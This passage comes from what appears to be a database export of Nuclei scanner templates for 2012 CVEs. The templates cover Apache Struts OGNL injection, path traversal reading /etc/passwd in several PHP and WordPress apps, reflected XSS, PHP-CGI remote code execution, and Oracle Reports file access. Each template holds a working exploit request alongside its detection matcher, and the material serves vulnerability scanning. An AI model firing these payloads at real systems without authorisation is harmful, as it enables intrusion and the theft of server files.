NOTE: the vendor characterizes this behavior as not \"a security vulnerability itself.\"\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected server.\n remediation: |\n Upgrade Apache Struts to a version higher than 2.3.1.1 or apply the necessary patches.\n reference:\n - https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/\n - https://www.exploit-db.com/exploits/31434\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394\n - http://www.exploit-db.com/exploits/18329\n - https://nvd.nist.gov/vuln/detail/CVE-2012-0394\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2012-0394\n cwe-id: CWE-94\n epss-score: 0.94527\n epss-percentile: 0.99071\n cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: apache\n product: struts\n shodan-query: html:\"Struts Problem Report\"\n tags: cve,cve2012,ognl,injection,edb,apache,struts\nvariables:\n first: \"{{rand_int(1000, 9999)}}\"\n second: \"{{rand_int(1000, 9999)}}\"\n result: \"{{to_number(first)*to_number(second)}}\"\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '{{result}}'\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201c0033f7d56e0c4a4fd3683b701ad52e9bfbc45406087f58789beb95e48a07b4022100aa2ad6d34f8e3503d13c60241edcdd958389ba9fbf8c1c2397823123707fd2e0:922c64590222798bb761d5b6d8e72950", "hash": "adaeff12d53488d69760d86a616a9e16", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee7" }, "name": "CVE-2012-0896.yaml", "content": "id: CVE-2012-0896\n\ninfo:\n name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access\n author: daffainfo\n severity: medium\n description: An absolute path traversal 
vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further compromise of the system.\n remediation: |\n Upgrade to a patched version of the Count Per Day plugin (version 3.2 or above) or apply the vendor-supplied patch to fix the path traversal vulnerability.\n reference:\n - https://packetstormsecurity.com/files/108631/\n - http://plugins.trac.wordpress.org/changeset/488883/count-per-day\n - https://nvd.nist.gov/vuln/detail/CVE-2012-0896\n - http://wordpress.org/extend/plugins/count-per-day/changelog/\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/72385\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2012-0896\n cwe-id: CWE-22\n epss-score: 0.02262\n epss-percentile: 0.88456\n cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: count_per_day_project\n product: count_per_day\n google-query: inurl:\"/wp-content/plugins/count-per-day\"\n tags: cve,cve2012,packetstorm,lfi,wordpress,wp-plugin,traversal,count_per_day_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022007e631af643f733a4519a2c1e7800b2069ac9f4a8dde3e52a1f02539bec03612022100c502c5c06225e633254d908221898977dd1bd89c3c42fe77d58cf0b9c0662919:922c64590222798bb761d5b6d8e72950", "hash": "3f1f24364a73f7dbcc2a26970ab871e4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee8" }, "name": "CVE-2012-0901.yaml", "content": "id: CVE-2012-0901\n\ninfo:\n name: YouSayToo auto-publishing 
1.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2012-0901\n - http://packetstormsecurity.org/files/view/108470/wpystap-xss.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/72271\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2012-0901\n cwe-id: CWE-79\n epss-score: 0.00216\n epss-percentile: 0.59612\n cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: attenzione\n product: yousaytoo\n google-query: inurl:\"/wp-content/plugins/yousaytoo-auto-publishing-plugin\"\n tags: cve,cve2012,wp-plugin,packetstorm,wordpress,xss,attenzione\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}'\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/yousaytoo-auto-publishing-plugin/'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
4a0a00473045022100e374adf6c147478410125b5e3b625bb2a7e4ec8df4e386b7879f80f3dd203adf02205b345024f1df4be0c598146291c73d2ae06bd1fc59ac90a35b037656b89c724e:922c64590222798bb761d5b6d8e72950", "hash": "5cb76c1380810512e8ddff7009e07506", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ee9" }, "name": "CVE-2012-0981.yaml", "content": "id: CVE-2012-0981\n\ninfo:\n name: phpShowtime 2.0 - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.\n remediation: |\n Upgrade to a patched version of phpShowtime or apply the necessary security patches to fix the directory traversal vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/18435\n - https://nvd.nist.gov/vuln/detail/CVE-2012-0981\n - http://www.exploit-db.com/exploits/18435\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/72824\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2012-0981\n cwe-id: CWE-22\n epss-score: 0.02053\n epss-percentile: 0.8779\n cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: kybernetika\n product: phpshowtime\n tags: cve,cve2012,phpshowtime,edb,lfi,kybernetika\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?r=i/../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009ca2f18ad8d070bdf0207d5fa9fc7624457e456cb19ff4ca43ff61f2de60c45c0220088cd5f5b2c7d4c45bdcc82ff376c9dca3910d4e9548446a1f26cf53a7ee27fd:922c64590222798bb761d5b6d8e72950", "hash": 
"c79e973f6f6f56992e27cf9ede4e7840", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eea" }, "name": "CVE-2012-0991.yaml", "content": "id: CVE-2012-0991\n\ninfo:\n name: OpenEMR 4.1 - Local File Inclusion\n author: daffainfo\n severity: low\n description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of OpenEMR.\n reference:\n - https://www.exploit-db.com/exploits/36650\n - https://nvd.nist.gov/vuln/detail/CVE-2012-0991\n - http://www.open-emr.org/wiki/index.php/OpenEMR_Patches\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/72914\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:P/I:N/A:N\n cvss-score: 3.5\n cve-id: CVE-2012-0991\n cwe-id: CWE-22\n epss-score: 0.81788\n epss-percentile: 0.98116\n cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: openemr\n product: openemr\n tags: cve,cve2012,lfi,openemr,traversal,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220101d33f30f59a0adfa367a4ee987a541972d7875a7ee03b1619f0d08e9f6b3f9022012689b42fe4983793ea90f15cf61c79b12064888b491888ae3002a7399a21322:922c64590222798bb761d5b6d8e72950", "hash": "acd58ca0091e974418c925f5c3c8f1d0", "level": 3, 
"time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eeb" }, "name": "CVE-2012-0996.yaml", "content": "id: CVE-2012-0996\n\ninfo:\n name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI)\n author: daffainfo\n severity: medium\n description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and compromise of the affected system.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/36784\n - https://nvd.nist.gov/vuln/detail/CVE-2012-0996\n - https://www.htbridge.ch/advisory/HTB23071\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2012-0996\n cwe-id: CWE-22\n epss-score: 0.02194\n epss-percentile: 0.89179\n cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: 11in1\n product: 11in1\n tags: cve,cve2012,lfi,edb,11in1\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100dc98cb6602e352bb8aa5efef1e54d6688d25f22ecbc3efaf5dce9484e5c80bfe02203f7741f62e7ad4d61e9fdc7d9e70ce5d6c6615fd714eba4d750f487ed7c55c29:922c64590222798bb761d5b6d8e72950", "hash": "bb6f6a4247db5021d134ee7e5a61cbc6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eec" }, "name": "CVE-2012-1226.yaml", "content": "id: CVE-2012-1226\n\ninfo:\n name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities\n author: 
daffainfo\n severity: high\n description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.\n impact: |\n Successful exploitation of these vulnerabilities could allow an attacker to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/36873\n - https://nvd.nist.gov/vuln/detail/CVE-2012-1226\n - http://www.vulnerability-lab.com/get_content.php?id=428\n - http://www.exploit-db.com/exploits/18480\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/73136\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2012-1226\n cwe-id: CWE-22\n epss-score: 0.10469\n epss-percentile: 0.94495\n cpe: cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:3.2.0:alpha:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dolibarr\n product: dolibarr_erp\\/crm\n tags: cve,cve2012,lfi,dolibarr,traversal,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022048642266c0f379d848603893d9e0c91da5249dd516c781d673e4b095329c23d402206b6f1fdea06b9501e7e5b50a7894d3057c08bc006fed84ec71d16a79e2076b90:922c64590222798bb761d5b6d8e72950", "hash": "acb6862e58d84df8cd31b18eeaf6da94", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eed" }, "name": "CVE-2012-1823.yaml", "content": "id: CVE-2012-1823\n\ninfo:\n name: PHP CGI v5.3.12/5.4.2 Remote Code Execution\n author: pikpikcu\n severity: 
high\n description: |\n sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.\n impact: |\n Remote code execution\n remediation: |\n Upgrade to a patched version of PHP or apply the necessary security patches.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823\n - https://nvd.nist.gov/vuln/detail/CVE-2012-1823\n - https://bugs.php.net/bug.php?id=61910\n - http://www.php.net/ChangeLog-5.php#5.4.2\n - http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03360041\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2012-1823\n cwe-id: CWE-20\n epss-score: 0.97491\n epss-percentile: 0.99972\n cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: php\n product: php\n tags: cve,cve2012,kev,vulhub,rce,php\n\nhttp:\n - raw:\n - |\n POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n \n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"3d638155445bffb044eec401381ad784\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210092b10c72cc1fee8c04f5162308500dd81d910b697076b941eca0df0f5f7b7b96022100c296adc6a0e2ad0ebf4759128a19fb25b155493104267eeaa81f3731eea84fb2:922c64590222798bb761d5b6d8e72950", "hash": "ac6aa47f8b2e0f2349ffffdf9802d687", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eee" }, "name": "CVE-2012-1835.yaml", "content": "id: CVE-2012-1835\n\ninfo:\n name: WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting\n author: daffainfo\n 
severity: medium\n description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of the All-in-One Event Calendar plugin to mitigate the XSS vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2012-1835\n - https://www.htbridge.com/advisory/HTB23082\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2012-1835\n cwe-id: CWE-79\n epss-score: 0.01124\n epss-percentile: 0.84313\n cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: timely\n product: all-in-one_event_calendar\n google-query: inurl:\"/wp-content/plugins/all-in-one-event-calendar\"\n tags: cve,cve2012,wordpress,xss,wp-plugin,timely\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'All-in-One Event Calendar'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n # - 
'{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'\n # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'\n # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'\n # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d0f21929860f7600e354f9be260a27aec7c3f220a6a630a898f7b803336b457902207f97220ddfd8ae7478400d9edce3f4d7acf3ae2560c73bd9a51481eb4b746d93:922c64590222798bb761d5b6d8e72950", "hash": "25e22e892d5a2e4492c6a0f3ca380899", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eef" }, "name": "CVE-2012-2371.yaml", "content": "id: CVE-2012-2371\n\ninfo:\n name: WP-FaceThumb 0.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Update to the latest version of the WP-FaceThumb plugin (0.2 or higher) which includes proper input sanitization to mitigate the XSS vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2012-2371\n - 
http://www.openwall.com/lists/oss-security/2012/05/15/12\n - http://packetstormsecurity.org/files/112658/WordPress-WP-FaceThumb-Gallery-0.1-Cross-Site-Scripting.html\n - http://wordpress.org/support/topic/plugin-wp-facethumb-reflected-xss-vulnerability-cwe-79\n - http://www.openwall.com/lists/oss-security/2012/05/16/1\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2012-2371\n cwe-id: CWE-79\n epss-score: 0.01345\n epss-percentile: 0.85828\n cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mnt-tech\n product: wp-facethumb\n tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'WP-FaceThumb ==='\n\n - method: GET\n path:\n - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a0f19a66f19b9b628c375cbd175da02282d99ce6598b8b245290ebfc19597cd002200365a77812a7640b94ab917c818377a18b3643202d6fd51e7d0063192c7fcfb7:922c64590222798bb761d5b6d8e72950", "hash": "d8d95b26d9e4a28844c91c8ebeb92760", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ef0" }, "name": "CVE-2012-3153.yaml", "content": "id: CVE-2012-3153\n\ninfo:\n name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)\n author: Sid Ahmed MALAOUI @ Realistic Security\n severity: medium\n description: |\n An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,\n 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown\n 
vectors related to Report Server Component.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution.\n remediation: |\n Apply the necessary patches and updates provided by Oracle to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2012-3152\n - https://www.exploit-db.com/exploits/31737\n - https://www.oracle.com/security-alerts/cpuoct2012.html\n - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html\n - http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N\n cvss-score: 6.4\n cve-id: CVE-2012-3153\n cwe-id: NVD-CWE-noinfo\n epss-score: 0.95986\n epss-percentile: 0.99354\n cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: oracle\n product: fusion_middleware\n tags: cve,cve2012,oracle,rce,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/reports/rwservlet/showenv\"\n - \"{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///\"\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_1, \"Reports Servlet\")'\n\n - type: dsl\n dsl:\n - '!contains(body_2, \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d81a01d9e3a4b64bcfd7aac7508ab474d68b724bba198ed9ff8e04c10bcc4f87022100df8bf6fd589da5ec88074d05bdb388d004d46da2b8dd0bf41c3430b97ececb4b:922c64590222798bb761d5b6d8e72950", "hash": "9c504f4b283b4aeca7551203377267b1", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ef3" }, "name": "CVE-2012-4253.yaml", "content": "id: CVE-2012-4253\n\ninfo:\n name: MySQLDumper 1.24.4 - Directory Traversal\n author: daffainfo\n severity: medium\n description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow 
remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade to a patched version of MySQLDumper or apply the necessary security patches to fix the directory traversal vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/37129\n - https://nvd.nist.gov/vuln/detail/CVE-2012-4253\n - http://packetstormsecurity.org/files/112304/MySQLDumper-1.24.4-LFI-XSS-CSRF-Code-Execution-Traversal.html\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/75286\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/75283\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2012-4253\n cwe-id: CWE-22\n epss-score: 0.0179\n epss-percentile: 0.87805\n cpe: cpe:2.3:a:mysqldumper:mysqldumper:1.24.4:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mysqldumper\n product: mysqldumper\n tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022034f990a5bff340326f593c8b149d2c1411d20ed9cf0844eb64585b1dbdc6f1e202204f319f36ce4f7c1b596ec339117b0cb8b258df92388a6d342faa644f81bc658f:922c64590222798bb761d5b6d8e72950", "hash": "0745a0f9107a500e375565b0c2754640", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ef4" }, "name": "CVE-2012-4273.yaml", "content": "id: CVE-2012-4273\n\ninfo:\n name: 2 Click Socialmedia Buttons < 0.34 - 
Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.\n impact: |\n Allows attackers to inject malicious scripts into web pages viewed by users, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the 2 Click Socialmedia Buttons plugin (0.34 or higher) to fix the XSS vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2012-4273\n - http://plugins.trac.wordpress.org/changeset?old_path=%2F2-click-socialmedia-buttons&old=532798&new_path=%2F2-click-socialmedia-buttons&new=532798\n - http://wordpress.org/extend/plugins/2-click-socialmedia-buttons/changelog/\n - http://packetstormsecurity.org/files/112615/WordPress-2-Click-Socialmedia-Buttons-Cross-Site-Scripting.html\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/75518\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2012-4273\n cwe-id: CWE-79\n epss-score: 0.00252\n epss-percentile: 0.64486\n cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ppfeufer\n product: 2-click-social-media-buttons\n google-query: inurl:\"/wp-content/plugins/2-click-socialmedia-buttons\"\n tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - '2 Click Social Media Buttons'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - 
'{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202bee2cd95cf9ec0567ff1a5d218e00bcb0bc94a2eb64a02d1eaba4f548c39b260220795d73a5a6109a449ce3e6710b87732e4a3506a6c775f024f82e9abc665fe5cc:922c64590222798bb761d5b6d8e72950", "hash": "181d2c67a7fa04e9d4b9283ac27ceb47", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ef5" }, "name": "CVE-2012-4547.yaml", "content": "id: CVE-2012-4547\n\ninfo:\n name: AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting\n author: dhiyaneshDk\n severity: medium\n description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.\n impact: |\n Allows remote attackers to inject arbitrary web script or HTML via the 'url' parameter.\n reference:\n - https://www.exploit-db.com/exploits/36164\n - https://nvd.nist.gov/vuln/detail/CVE-2012-4547\n - http://awstats.sourceforge.net/docs/awstats_changelog.txt\n - http://openwall.com/lists/oss-security/2012/10/29/7\n - http://openwall.com/lists/oss-security/2012/10/26/1\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2012-4547\n cwe-id: CWE-79\n epss-score: 0.0023\n epss-percentile: 0.61246\n cpe: cpe:2.3:a:laurent_destailleur:awstats:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: laurent_destailleur\n product: awstats\n tags: 